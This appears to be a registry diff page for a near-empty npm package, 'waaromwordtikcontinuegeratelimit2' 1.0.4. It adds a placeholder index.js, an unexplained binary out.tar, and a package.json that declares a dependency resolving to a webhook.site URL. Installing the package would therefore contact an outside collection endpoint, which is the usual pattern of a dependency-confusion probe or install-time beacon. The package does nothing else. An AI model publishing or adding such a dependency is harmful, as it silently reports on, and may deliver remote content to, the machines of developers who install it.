waaromwordtikcontinuegeratelimit2 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -0
- package/out.tar +0 -0
- package/package.json +14 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
console.log('index')
|
package/out.tar
ADDED
Binary file
|
package/package.json
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "waaromwordtikcontinuegeratelimit2",
|
3
|
+
"version": "1.0.4",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
},
|
8
|
+
"dependencies": {
|
9
|
+
"foo": "https://webhook.site/485cb907-e732-4f8a-8cc1-996f11e171bc?x=1"
|
10
|
+
},
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC",
|
13
|
+
"description": ""
|
14
|
+
}
|